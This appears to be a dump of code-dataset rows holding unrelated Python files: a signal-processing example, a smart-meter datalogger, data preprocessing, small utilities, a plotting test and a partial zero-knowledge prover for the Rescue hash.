if location is None:
location_data = {
"country": "n/a"
}
else:
location_data = location.raw
location_data = location_data["address"]
return location_data
|
21,969 | c137935946508166409ea6e6ed8430b67239d583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# example_parallel_chains.py
# Jan 27, 2015 10:45:00 EST
# Copyright 2015
#
# Andre Young <andre.young@cfa.harvard.edu>
# Harvard-Smithsonian Center for Astrophysics
# 60 Garden Street, Cambridge
# MA 02138
#
# Changelog:
# AY: Created 2015-01-27
"""
Simple example to illustrate the use of parallel signal chains.
A multitone signal is used as input to two parallel signal processing
paths. Each path consists of two chains. The first chain consists of an
analog delay and flat gain, the parameters of which are different for each
parallel path. The second chain consists of a frequency phase and magnitude
slope, which is use the same parameters for both parallel paths.
The input contains a 1GHz and 4GHz sinusoid. The delay is a quarter period (1GHz),
positive for one path and negative for the other. The flat gain is 1.2 for
the one path and 0.8 for the other. The phase slope implements a half-period
delay (1GHz) and the magnitude slope effectively removes the 4GHz tone.
"""
# some useful libraries to import
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
# import SimSWARM modules
import SimSWARM.Signal as sg
import SimSWARM.Blocks as bl
# turn interactive plot on
plt.interactive(True)
def main():
# The signals herein are mostly encapsulated in AnalogSignal
# instances which need to be sampled in order to visualize.
# The sampling characteristics for this purpose are defined below.
rate = 64.0e9 #
num_of_samples = 128 #
time_start = 0 # sample from t=0
tvec = np.arange(time_start,1.0*num_of_samples/rate,1.0/rate)
# scale tvec to nanoseconds
tvec = tvec*1.0e9
# Create the multitone signal
#
soi_list = list()
tone_frequencies = (1.0e9,4.0e9)
tone_amplitudes = (1.0,0.1)
tone_phases = 0.0
for ii in range(0,len(tone_frequencies)):
tone_frequency = tone_frequencies[ii]
tone_amplitude = tone_amplitudes[ii]
tone_generator = sg.SinusoidGenerator(tone_amplitude,tone_frequency,tone_phases)
soi_list.append(sg.AnalogSignal(tone_generator))
combiner_block = bl.AnalogCombiner()
combiner_block.attach_source(soi_list)
# Build the first chain (separate)
# for antenna 1
ant1_delay = 0.25/1.0e9 # quarter period delay at 1GHz
ant1_flat_gain = 1.2
chain1_1 = build_chain_separate(ant1_delay,ant1_flat_gain)
# and for antenna 2
ant2_delay = -0.25/1.0e9 # quarter period advance at 1GHz
ant2_flat_gain = 0.8
chain1_2 = build_chain_separate(ant2_delay,ant2_flat_gain)
# Create Parallel using list - used when the blocks in each
# parallel path are different
par1 = bl.Parallel(list((chain1_1,chain1_2)))
# Build the second chain (common)
both_phase_slope = 0.5e-9 # half period delay at 1GHz
both_magnitude_slope = -10 # dB/GHz
chain2 = build_chain_common(both_phase_slope,both_magnitude_slope)
# Create Parallel using single block - used when the blocks in each
# parallel path is the same
par2 = bl.Parallel(chain2,n=2) # have to specify n, the number of paths
# Connect the signal path
par1.attach_source(combiner_block)
par2.attach_source(par1)
# Generate output
out1 = par1.output()
out2 = par2.output()
# Plot the results
plt.figure()
plt.plot(tvec,combiner_block.output().sample(rate,num_of_samples,time_start),label='SoI')
plt.legend()
plt.title('Signal with large 1GHz and small 4GHz component, both start at 0deg phase.')
plt.xlabel('Time [ns]')
plt.show()
plt.figure()
plt.plot(tvec,out1[0].sample(rate,num_of_samples,time_start),'--',label='Chain 1 (channel 1)')
plt.plot(tvec,out1[1].sample(rate,num_of_samples,time_start),'--',label='Chain 1 (channel 2)')
plt.legend()
plt.title('Output of first chain: 1.2 gain + delay (channel 1) and 0.8 gain + advance (channel 2)')
plt.xlabel('Time [ns]')
plt.show()
plt.figure()
plt.plot(tvec,out2[0].sample(rate,num_of_samples,time_start),'--',label='Chain 2 (channel 1)')
plt.plot(tvec,out2[1].sample(rate,num_of_samples,time_start),'--',label='Chain 2 (channel 2)')
plt.legend()
plt.title('Output of second chain: 4GHz removed and phase inversion.')
plt.xlabel('Time [ns]')
plt.show()
# wait for input before closing
print "Press ENTER to exit."
raw_input()
return 0
def build_chain_separate(delay,flat_gain):
"""
Build and return a signal processing block chain.
The chain comprises a delay block and a flat gain block,
in that order.
Arguments:
delay -- Delay block parameter.
flat_gain -- Flat gain block parameter
"""
chain = bl.Chain()
chain.add_block(bl.AnalogDelay(delay))
chain.add_block(bl.AnalogGain(flat_gain))
return chain
def build_chain_common(phase_slope,magnitude_slope):
"""
Build and return a signal processing block chain.
The chain comprises a frequency domain phase and magnitude slope.
Arguments:
phase_slope -- The phase gradient parameter.
magnitude_slope -- The magnitude gradient parameter.
"""
chain = bl.Chain()
chain.add_block(bl.AnalogFrequencyPhaseSlope(phase_slope))
chain.add_block(bl.AnalogFrequencyGainSlope(magnitude_slope))
return chain
if __name__ == '__main__':
main()
|
21,970 | 17d4db2ae9595483d89adc863bf459b24fba0cdd | #!/usr/bin/env python3
"""
https://dsmr-reader.readthedocs.io/en/latest/installation/datalogger.html
Installation:
pip3 install pyserial==3.4 requests==2.24.0 python-decouple==3.3
"""
import datetime
import logging
import time
import re
import serial
import requests
import decouple
logger = logging.getLogger('dsmrreader')
def read_telegram(url_or_port, telegram_timeout, **serial_kwargs): # noqa: C901
""" Opens a serial/network connection and reads it until we have a full telegram. Yields the result """
MAX_BYTES_PER_READ = 2048
MAX_READ_TIMEOUT = 1.0 / 3 # Will cancel read() if it does not receive MAX_BYTES_PER_READ Bytes in time.
logger.info(
'[%s] Opening connection "%s" using options: %s',
datetime.datetime.now(),
url_or_port,
serial_kwargs
)
try:
serial_handle = serial.serial_for_url(url=url_or_port, timeout=MAX_READ_TIMEOUT, **serial_kwargs)
except Exception as error:
raise RuntimeError('Failed to connect: {}', error)
buffer = ''
start_timestamp = time.time()
while True:
# Abort the infinite loop at some point.
if time.time() - start_timestamp > telegram_timeout:
raise RuntimeError(
'It took too long to detect a telegram. Check connection params. Bytes currently in buffer: {}'.format(
len(buffer)
)
)
incoming_bytes = serial_handle.read(MAX_BYTES_PER_READ)
logger.debug('[%s] Read %d Byte(s)', datetime.datetime.now(), len(incoming_bytes))
if not incoming_bytes:
continue
incoming_data = str(incoming_bytes, 'latin_1')
# Just add data to the buffer until we detect a telegram in it.
buffer += incoming_data
# Should work for 99% of the telegrams read. The checksum bits are optional due to legacy meters omitting them.
match = re.search(r'(/[^/]+![A-Z0-9]{0,4})', buffer, re.DOTALL)
if not match:
continue
yield match.group(1)
# Reset for next iteration.
buffer = ''
serial_handle.reset_input_buffer()
start_timestamp = time.time()
def _send_telegram_to_remote_dsmrreader(telegram, api_url, api_key, timeout):
""" Registers a telegram by simply sending it to the application with a POST request. """
logger.debug('[%s] Sending telegram to API: %s', datetime.datetime.now(), api_url)
response = requests.post(
api_url,
headers={'Authorization': 'Token {}'.format(api_key)},
data={'telegram': telegram},
timeout=timeout, # Prevents this script from hanging indefinitely when the server or network is unavailable.
)
if response.status_code != 201:
logger.error('[%s] API error: HTTP %d - %s', datetime.datetime.now(), response.status_code, response.text)
return
logger.debug('[%s] API response OK: Telegram received successfully', datetime.datetime.now())
def _initialize_logging():
logging_level = logging.INFO
if decouple.config('DATALOGGER_DEBUG_LOGGING', default=False, cast=bool):
logging_level = logging.DEBUG
logger.setLevel(logging_level)
logger.addHandler(logging.StreamHandler())
def main(): # noqa: C901
""" Entrypoint for command line execution only. """
_initialize_logging()
logger.info('[%s] Starting...', datetime.datetime.now())
# Settings.
DATALOGGER_TIMEOUT = decouple.config('DATALOGGER_TIMEOUT', default=20, cast=float)
DATALOGGER_SLEEP = decouple.config('DATALOGGER_SLEEP', default=0.5, cast=float)
DATALOGGER_INPUT_METHOD = decouple.config('DATALOGGER_INPUT_METHOD')
DATALOGGER_API_HOSTS = decouple.config('DATALOGGER_API_HOSTS', cast=decouple.Csv(post_process=tuple))
DATALOGGER_API_KEYS = decouple.config('DATALOGGER_API_KEYS', cast=decouple.Csv(post_process=tuple))
DATALOGGER_MIN_SLEEP_FOR_RECONNECT = decouple.config('DATALOGGER_MIN_SLEEP_FOR_RECONNECT', default=1.0, cast=float)
if not DATALOGGER_API_HOSTS or not DATALOGGER_API_KEYS:
raise RuntimeError('API_HOSTS or API_KEYS not set')
if len(DATALOGGER_API_HOSTS) != len(DATALOGGER_API_KEYS):
raise RuntimeError('The number of API_HOSTS and API_KEYS given do not match each other')
serial_kwargs = dict(
telegram_timeout=DATALOGGER_TIMEOUT,
)
if DATALOGGER_INPUT_METHOD == 'serial':
serial_kwargs.update(dict(
url_or_port=decouple.config('DATALOGGER_SERIAL_PORT'),
baudrate=decouple.config('DATALOGGER_SERIAL_BAUDRATE', cast=int, default=115200),
bytesize=decouple.config('DATALOGGER_SERIAL_BYTESIZE', cast=int, default=serial.EIGHTBITS),
parity=decouple.config('DATALOGGER_SERIAL_PARITY', cast=str, default=serial.PARITY_NONE),
stopbits=serial.STOPBITS_ONE,
xonxoff=1,
rtscts=0,
))
elif DATALOGGER_INPUT_METHOD == 'ipv4':
serial_kwargs.update(dict(
url_or_port='socket://{}:{}'.format(
decouple.config('DATALOGGER_NETWORK_HOST'),
decouple.config('DATALOGGER_NETWORK_PORT', cast=int),
)
))
else:
raise RuntimeError('Unsupported DATALOGGER_INPUT_METHOD')
datasource = None
while True:
if not datasource:
datasource = read_telegram(**serial_kwargs)
telegram = next(datasource)
# Do not persist connections when the sleep is too high.
if DATALOGGER_SLEEP >= DATALOGGER_MIN_SLEEP_FOR_RECONNECT:
datasource = None
logger.info("[%s] Telegram read", datetime.datetime.now())
for current_server_index in range(len(DATALOGGER_API_HOSTS)):
current_api_host = DATALOGGER_API_HOSTS[current_server_index]
current_api_url = '{}/api/v1/datalogger/dsmrreading'.format(current_api_host)
current_api_key = DATALOGGER_API_KEYS[current_server_index]
try:
_send_telegram_to_remote_dsmrreader(
telegram=telegram,
api_url=current_api_url,
api_key=current_api_key,
timeout=DATALOGGER_TIMEOUT,
)
except Exception as error:
logger.exception(error)
logger.debug("[%s] Sleeping for %s second(s)", datetime.datetime.now(), DATALOGGER_SLEEP)
time.sleep(DATALOGGER_SLEEP)
if __name__ == '__main__': # pragma: no cover
main()
|
21,971 | fab5b342ec6e5d181e1ffbf5ffcd33433f883d4c | from preprocess import *
import os
file = './data/processed/batch4.data'
if os.path.exists(file):
for b_idx in range(1, 5):
bin_file = './data/processed/batch%d.data' % b_idx
batch = 'b%d' % b_idx
data_path = r'./data/raw/batch%d' % b_idx
D = data(bin_file)
print('Process batch : %d' % b_idx)
if os.path.exists(D.bin_file):
with open(D.bin_file, 'rb') as f:
D = pickle.load(f)
D.bin_file = bin_file
else:
D.read_data(batch, data_path)
D.save_data()
D.produce_minidata()
del D
bin_file = './data/processed/total.data_Mini'
D = data(bin_file)
if not os.path.exists(D.bin_file):
D1 = data('./data/processed/batch1.data_Mini')
D2 = data('./data/processed/batch2.data_Mini')
D3 = data('./data/processed/batch3.data_Mini')
D4 = data('./data/processed/batch4.data_Mini')
with open(D1.bin_file, 'rb') as f:
D1 = pickle.load(f)
for cap in D1.caps:
D.caps.append(cap)
del D1
with open(D2.bin_file, 'rb') as f:
D2 = pickle.load(f)
for cap in D2.caps:
D.caps.append(cap)
del D2
with open(D3.bin_file, 'rb') as f:
D3 = pickle.load(f)
for cap in D3.caps:
D.caps.append(cap)
del D3
with open(D4.bin_file, 'rb') as f:
D4 = pickle.load(f)
for cap in D4.caps:
D.caps.append(cap)
del D4
D.save_data()
else:
with open(D.bin_file, 'rb') as f:
D = pickle.load(f)
# The index we use
train_index, test_index = index_split(D.caps)
# The methods to get data or feature
# cap.get_data_from_cycle('cycle', 'discharge_capacitance(F)', 657)
# cap.V_drop_with_cycle(657,2)
|
21,972 | 458bcad21b3a7d70a3775a21a9710f04b931b975 | def reverse(s):
s=s[::-1]
return ''.join(s)
print reverse("string reverse works now")
|
21,973 | e19eccc4e8552c4cbd4e93c4841bfff451576913 | from connectdb import connection
import MySQLdb
import random
import urllib2
def randomize_1000():
try:
c,conn = connection()
baselong = 40.073410
baselat = -88.304178
for i in xrange(15):
templong = baselong + random.random()*0.06
templat = baselat + random.random()*0.141
word = str(urllib2.urlopen("http://randomword.setgetgo.com/get.php").read())
c.execute("INSERT INTO wordlocation (word,longitude,latitude,definition,lang) VALUES(%s,%s,%s,%s,%s)",
(word,templong,templat,'I honestly dont know','english'))
conn.commit()
c.execute("SELECT * FROM wordlocation")
for row in c.fetchall():
print str(row)
c.close()
return
except Exception as e:
return str(e)
randomize_1000()
|
21,974 | 3ab02d75586e32696aaea4380357112fe046af93 | from livelossplot import PlotLosses
from livelossplot.outputs import ExtremaPrinter
def test_extrema_print():
"""Test if plugin object cache contains valid values"""
groups = {'accuracy': ['acc', 'val_acc'], 'log-loss': ['loss', 'val_loss']}
plugin = ExtremaPrinter()
outputs = (plugin, )
liveplot = PlotLosses(outputs=outputs, groups=groups)
liveplot.update({'acc': 0.5, 'val_acc': 0.4, 'loss': 1.2, 'val_loss': 1.1})
liveplot.update({'acc': 0.55, 'val_acc': 0.45, 'loss': 1.1, 'val_loss': 1.0})
liveplot.update({'acc': 0.65, 'val_acc': 0.35, 'loss': 0.5, 'val_loss': 0.9})
liveplot.update({'acc': 0.65, 'val_acc': 0.55, 'loss': 1.0, 'val_loss': 0.9})
liveplot.send()
assert len(plugin.extrema_cache['log-loss']) == 2
assert len(plugin.extrema_cache['log-loss']['training']) == 3
assert plugin.extrema_cache['accuracy']['validation']['min'] == 0.35
assert plugin.extrema_cache['accuracy']['validation']['max'] == 0.55
assert plugin.extrema_cache['accuracy']['validation']['current'] == 0.55
|
21,975 | e2bebf72c00946ebd276e1e10eb8fc58488cd019 | import numpy as np
from math import ceil, log
import time
from .rescue.rescue_constants import MDS_MATRIX, INV_MDS_MATRIX, ROUND_CONSTANTS, PRIME, WORD_SIZE, NUM_ROUNDS, STATE_SIZE
from .poly_utils import PrimeField
from .utils import get_power_cycle, get_pseudorandom_indices, is_a_power_of_2
from .fft import fft
from .fri import prove_low_degree, verify_low_degree_proof
from .permuted_tree import merkelize, mk_branch, verify_branch, blake, mk_multi_branch, verify_multi_branch
import random
modulus = PRIME
extension_factor = 8
f = PrimeField(modulus)
TRACE_SIZE = 16
RAND_BEFORE = 1
RAND_AFTER = 0
spot_check_security_factor = 20
BatchHeight = 32
HashesPerBatch = 3
constraints_powers_dict = {i : (lambda x,y:0) for i in range(20)}
constrains_power_dict = {
0: lambda total_power, comp_length: total_power - comp_length,
1: lambda total_power, comp_length: total_power - comp_length,
2: lambda total_power, comp_length: total_power - 6*comp_length,
3: lambda total_power, comp_length: total_power - 6*comp_length,
4: lambda total_power, comp_length: total_power - 6*comp_length,
5: lambda total_power, comp_length: total_power - 6*comp_length,
6: lambda total_power, comp_length: total_power - 4*comp_length,
7: lambda total_power, comp_length: total_power - comp_length,
8: lambda total_power, comp_length: total_power - comp_length,
9: lambda total_power, comp_length: total_power - comp_length,
10: lambda total_power, comp_length: total_power - comp_length,
11: lambda total_power, comp_length: total_power - comp_length,
12: lambda total_power, comp_length: total_power - comp_length,
13: lambda total_power, comp_length: total_power - comp_length,
14: lambda total_power, comp_length: total_power - comp_length,
15: lambda total_power, comp_length: total_power - comp_length,
16: lambda total_power, comp_length: total_power - comp_length,
17: lambda total_power, comp_length: total_power - comp_length,
18: lambda total_power, comp_length: total_power - comp_length,
19: lambda total_power, comp_length: total_power - comp_length,
}
NUM_CONSTRAINTS = 200
def HalfRound(state, round_index, p):
mds_matrix = np.array(MDS_MATRIX, dtype=object) % p
if round_index % 2 == 1:
state = [pow(x, (2*p - 1) // 3, p) for x in state]
else:
state = [pow(x, 3, p) for x in state]
state = mds_matrix.dot(state) % p
state = [(state[i] + ROUND_CONSTANTS[round_index][i]) % p for i in range(STATE_SIZE)]
return state
def get_power_list(total_length, comp_length, hash = True):
powers = []
for i in range(4):
powers.append(constraints_powers_dict[0](total_length, comp_length))
for i in range(4):
powers.append(constraints_powers_dict[1](total_length, comp_length))
for i in range(STATE_SIZE):
powers.append(constraints_powers_dict[2](total_length, comp_length))
for i in range(4):
powers.append(constraints_powers_dict[3](total_length, comp_length))
for i in range(STATE_SIZE - 4):
powers.append(constraints_powers_dict[4](total_length, comp_length))
for i in range(4):
powers.append(constraints_powers_dict[5](total_length, comp_length))
for i in range(STATE_SIZE):
powers.append(constraints_powers_dict[6](total_length, comp_length))
for i in range(4):
powers.append(constraints_powers_dict[7](total_length, comp_length))
for i in range(4):
powers.append(constraints_powers_dict[8](total_length, comp_length))
for i in range(STATE_SIZE*STATE_SIZE):
powers.append(constraints_powers_dict[9](total_length, comp_length))
if hash:
for i in range(4):
powers.append(constraints_powers_dict[10](total_length, comp_length))
for i in range(TRACE_SIZE + 1):
powers.append(total_length - comp_length)
return powers
def append_state(trace, state):
for i in range(STATE_SIZE):
trace[i].append(state[i])
for i in range(STATE_SIZE, TRACE_SIZE):
trace[i].append(0)
def rescue_computational_trace(input, file_hash = None, output = None):
input_length = len(input)
if file_hash is not None:
input_and_hash = input + [random.randrange(1, PRIME) for _ in range(12*RAND_BEFORE)] + file_hash + [random.randrange(1, PRIME) for _ in range(8 + 12*RAND_AFTER)]
else:
input_and_hash = input[:]
inp_hash_length = len(input_and_hash)
chain_length = ceil((inp_hash_length - 4) / 4)
# We do HashesPerBatch so that the total append_states amount will be BatchHeight, which is a power of two
log_trace_length = log(ceil(chain_length / HashesPerBatch), 2)
# We want to have a power of 2 number of batches, so that the total height will also be a power of 2
trace_length = 2**(ceil(log_trace_length))
#We want the trace to be of length that is a power of two.
new_input = input_and_hash + [random.randrange(1, PRIME)for _ in range(4 + 12*trace_length - inp_hash_length)]
trace_length = 32*trace_length
p = PRIME
trace = [[] for i in range(TRACE_SIZE)]
state = [0] * STATE_SIZE
inp_index = 0
for i in range(4):
state[i] = new_input[inp_index + i]
inp_index += 4
while len(trace[0]) < trace_length:
for hash_ind in range(3):
for i in range(4):
state[4 + i] = new_input[inp_index + i]
state[8 + i] = 0
inp_index += 4
if hash_ind == 0:
append_state(trace, state)
state = [(state[i] + ROUND_CONSTANTS[0][i]) % p for i in range(STATE_SIZE)]
for round in range(NUM_ROUNDS):
state = HalfRound(state, round*2 + 1, p)
append_state(trace, state)
state = HalfRound(state, round*2 + 2, p)
if input_length <= inp_index and inp_index < input_length + 4:
#We're right after the original hash calculation
assert state[:4] == output, "Error in hash calculation"
append_state(trace, state)
assert len(trace[0]) % 32 == 0
full_trace = []
for i in range(len(trace[0])):
for s in trace:
full_trace.append(s[i])
return full_trace
def create_rescue_polynoms(precision, output, file_hash = None):
comp_length = precision // extension_factor
# Root of unity such that x^precision=1
G2 = f.exp(7, (modulus - 1) // precision)
# Root of unity such that x^steps=1
skips = precision // comp_length
G1 = f.exp(G2, skips)
#Create consts polynomial for each state_ind
all_even_consts = []
all_odd_consts = []
for state_ind in range(TRACE_SIZE):
odd_consts = []
even_consts = []
even_consts.append(0)
if state_ind < STATE_SIZE:
for j in range(HashesPerBatch):
if state_ind < 4:
even_consts[-1] += ROUND_CONSTANTS[0][state_ind]
else:
even_consts[-1] = ROUND_CONSTANTS[0][state_ind]
for round in range(NUM_ROUNDS):
odd_consts.append(ROUND_CONSTANTS[2*round + 1][state_ind])
even_consts.append(ROUND_CONSTANTS[2*round + 2][state_ind])
even_consts.append(0)
odd_consts.append(0)
odd_consts.append(0)
else:
even_consts = [0]*BatchHeight
odd_consts = [0]*BatchHeight
all_even_consts.append(even_consts)
all_odd_consts.append(odd_consts)
all_even_next_eval = [all_even_consts[i % TRACE_SIZE][(i // TRACE_SIZE) % BatchHeight] for i in range(comp_length)]
all_even_poly = fft(all_even_next_eval, modulus, G1, inv = True)
all_even_eval = fft(all_even_poly, modulus, G2)
all_odd_next_eval = [all_odd_consts[i % TRACE_SIZE][(i // TRACE_SIZE) % BatchHeight] for i in range(comp_length)]
new_mds = [[] for i in range(TRACE_SIZE)]
new_inv_mds = [[] for i in range(TRACE_SIZE)]
for i in range(TRACE_SIZE):
for j in range(TRACE_SIZE):
if i < STATE_SIZE and j < STATE_SIZE:
new_mds[i].append(MDS_MATRIX[i][j])
new_inv_mds[i].append(INV_MDS_MATRIX[i][j])
else:
new_mds[i].append(0)
new_inv_mds[i].append(0)
mds_mini = []
inv_mds_mini = []
for i in range(TRACE_SIZE):
mds_mini.append([new_mds[j % TRACE_SIZE][i] for j in range(comp_length)])
inv_mds_mini.append([new_inv_mds[j % TRACE_SIZE][i] for j in range(comp_length)])
mds_poly = [fft(mini, modulus, G1, inv = True) for mini in mds_mini]
inv_mds_poly = [fft(mini, modulus, G1, inv = True) for mini in inv_mds_mini]
mds_eval = [fft(poly, modulus, G2) for poly in mds_poly]
inv_mds_eval = [fft(poly, modulus, G2) for poly in inv_mds_poly]
odd_consts_mod_mini = []
for i in range(TRACE_SIZE):
odd_consts_mod_mini.append([all_odd_next_eval[j - (j % TRACE_SIZE) + i] for j in range(comp_length)])
odd_consts_mod_poly = [fft(mini, modulus, G1, inv = True) for mini in odd_consts_mod_mini]
odd_consts_mod_eval = [fft(poly, modulus, G2) for poly in odd_consts_mod_poly]
output_mini = [output[i % len(output)] for i in range(comp_length)]
output_poly = fft(output_mini, modulus, G1, inv = True)
output_eval = fft(output_poly, modulus, G2)
if file_hash is not None:
file_hash_mini = [file_hash[i % len(file_hash)] for i in range(comp_length)]
file_hash_poly = fft(file_hash_mini, modulus, G1, inv = True)
file_hash_eval = fft(file_hash_poly, modulus, G2)
return all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval
return all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, None
def rescue_sign(password, password_output, file_hash = None, constraints_powers_dict=constraints_powers_dict):
start_time = time.time()
full_trace = rescue_computational_trace(password, file_hash, output = password_output)
comp_length = len(full_trace)
input_length = len(password)
chain_length = ceil((input_length - 4) / 4)
precision = comp_length * extension_factor
# Root of unity such that x^precision=1
G2 = f.exp(7, (modulus - 1) // precision)
# Root of unity such that x^steps=1
skips = precision // comp_length
G1 = f.exp(G2, skips)
# Powers of the higher-order root of unity
xs = get_power_cycle(G2, modulus)
skips2 = comp_length // (BatchHeight * TRACE_SIZE)
all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval = create_rescue_polynoms(precision, password_output, file_hash)
# Interpolate the computational trace into a polynomial P, with each step
# along a successive power of G1
computational_trace_polynomial = fft(full_trace, modulus, G1, inv=True)
p_evaluations_extension = fft(computational_trace_polynomial, modulus, G2)
print('Converted computational steps into a polynomial and low-degree extended it')
p_mod_mini = []
for i in range(TRACE_SIZE):
p_mod_mini.append([full_trace[j - (j % TRACE_SIZE) + i] for j in range(comp_length)])
p_mod_poly = [fft(mini, modulus, G1, inv = True) for mini in p_mod_mini]
p_mod_eval = [fft(poly, modulus, G2) for poly in p_mod_poly]
state_after_eval = all_even_eval[:]
for i in range(TRACE_SIZE):
state_after_eval = [f.add(st, f.mul(m, f.exp(p, 3))) for (st, m, p) in zip(state_after_eval, mds_eval[i], p_mod_eval[i])]
state_before_eval = [0 for i in range(precision)]
for i in range(TRACE_SIZE):
subbed = [f.sub(p_mod_eval[i][(j + TRACE_SIZE * extension_factor) % precision], odd_consts_mod_eval[i][j]) for j in range(precision)]
state_before_eval = [f.add(st, f.mul(m, su)) for (st, m, su) in zip(state_before_eval, inv_mds_eval[i], subbed)]
state_before_eval = [f.exp(st, 3) for st in state_before_eval]
#We compute evaluation on the extension field
trace_plus_round0_eval = [p_evaluations_extension[i] + all_even_eval[i] for i in range(precision)]
trace_minus_output_eval = [p_evaluations_extension[i] - output_eval[i] for i in range(precision)]
if file_hash_eval is not None:
trace_minus_file_hash_eval = [p_evaluations_extension[i] - file_hash_eval[i] for i in range(precision)]
print("Computed all values polynomials")
constraints = []
#We enforce constraints on the state - such that
# 1. The trace is a true rescue computation state
# 2. The hash of the passwords appears in the state
# 3. The file_hash is hashed as well
# 4. The p_mod_evals are correct
skips3 = comp_length // TRACE_SIZE
#This represents something that happens once every state
once_state_eval = [xs[(i*skips3) % precision] - 1 for i in range(precision)]
#Constraints 0 check that the last 4 bytes of every state are 0 (since we need a power of 2, but the original state is only of size 12)
for state_ind in range(STATE_SIZE, TRACE_SIZE):
filler_states = [once_state_eval[(i - state_ind*extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraint0_evals = [f.mul(pv, fs) for (pv, fs) in zip(p_evaluations_extension, filler_states_inv)]
constraints.append((0, constraint0_evals))
#This represents something that happens once every batch
once_batch_eval = [xs[(i*skips2) % precision] - 1 for i in range(precision)]
#Constraints 1 check that in the beginning of each batch, bytes 8-12 are 0 (since the inital state is only of size 8)
for state_ind in range(8, STATE_SIZE):
barch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE * extension_factor - state_ind * extension_factor) %precision] for i in range(precision)]
batch_ind0_inv = f.multi_inv(barch_ind0)
constraint1_evals = [f.mul(pv , bi) for (pv, bi) in zip(p_evaluations_extension, batch_ind0_inv)]
constraints.append((1, constraint1_evals))
#Constraints 2 check that at the beginning of each batch, the first state is just half_state before the next one (this is a rescue demand)
for state_ind in range(0, STATE_SIZE):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE*extension_factor - state_ind * extension_factor) %precision] for i in range(precision)]
batch_ind0_inv = f.multi_inv(batch_ind0)
constraints2_eval = [f.mul(f.sub(tpc0, stb) ,bi) for (tpc0, stb, bi) in zip(trace_plus_round0_eval, state_before_eval, batch_ind0_inv)]
constraints.append((2, constraints2_eval))
#Constraint3 represents that for every 2 states that are not the beginning or end
# (i % 32 != 0, 30, 31), we have state_before(next half round) = state_after(half round)
# That's true for the first 4 bytes because:
# a) they pass on (and not deleted in the next hash iteration)
# b) we've fixed consts such that they already include consts[0]
for state_ind in range(0, 4):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(f.mul(bi0, bi30),bi31) for (bi0, bi30, bi31) in zip(batch_ind0, batch_ind30, batch_ind31)]
filler_states = [once_state_eval[(i - state_ind* extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints3_eval = [(sta - stb) * abi * fs for (sta, stb, abi, fs) in zip(state_after_eval, state_before_eval, all_batches, filler_states_inv)]
constraints.append((3, constraints3_eval))
#Constraint4 is almost as 3, but for 4:12, and that means that this condition does not apply
# also when starting a new hash within the same batch (index 10, 20 as well)
for state_ind in range(4, STATE_SIZE):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind10 = [once_batch_eval[(i - 10 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind20 = [once_batch_eval[(i - 20 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(f.mul(f.mul(f.mul(bi0, bi10),bi20), bi30),bi31) for (bi0, bi10 , bi20, bi30, bi31) in zip(batch_ind0, batch_ind10, batch_ind20, batch_ind30, batch_ind31)]
filler_states = [once_state_eval[(i - state_ind * extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints4_eval = [(sta - stb) * abi * fs for (sta, stb, abi, fs) in zip(state_after_eval, state_before_eval, all_batches, filler_states_inv)]
constraints.append((4, constraints4_eval))
# Constraints 5 check that in the new hashes within the same batch (indexes 10, 20), bytes 8:12 are 0 (since a new hash's initial state is only 8 bytes)
for state_ind in range(STATE_SIZE - 4, STATE_SIZE):
batch_ind10 = [once_batch_eval[(i - 10 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind20 = [once_batch_eval[(i - 20 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(b10, b20) for (b10, b20) in zip(batch_ind10, batch_ind20)]
all_batches_inv = f.multi_inv(all_batches)
constraints5_eval = [f.sub(state_before_eval[i], all_even_eval[i]) * all_batches_inv[i] for i in range(precision)]
constraints.append((5, constraints5_eval))
# Constraints 6 checks that the start of the last state is just half round after the one before it.
for state_ind in range(0, STATE_SIZE):
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch30_inv = f.multi_inv(batch_ind30)
constraints6_eval = [(p_evaluations_extension[(i + extension_factor*TRACE_SIZE) % precision] - state_after_eval[i]) * batch30_inv[i] for i in range(precision)]
constraints.append((6, constraints6_eval))
# Constraints 7 check that the first row after a batch is the last row before the batch (since this is how we create the trace)
for state_ind in range(0, 4):
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch31_inv = f.multi_inv(batch_ind31)
last_step_eval = [xs[i] - xs[(comp_length - TRACE_SIZE + state_ind)*extension_factor] for i in range(precision)]
constraints7_eval = [(p_evaluations_extension[(i + extension_factor*TRACE_SIZE) % precision] - p_evaluations_extension[i]) * batch31_inv[i] * last_step_eval[i] for i in range(precision)]
constraints.append((7, constraints7_eval))
#Constraints 8 check that the password hash is actually within the trace in the right spot (this checks that we actually have a preimage of the hash)
for state_ind in range(0, len(password_output)):
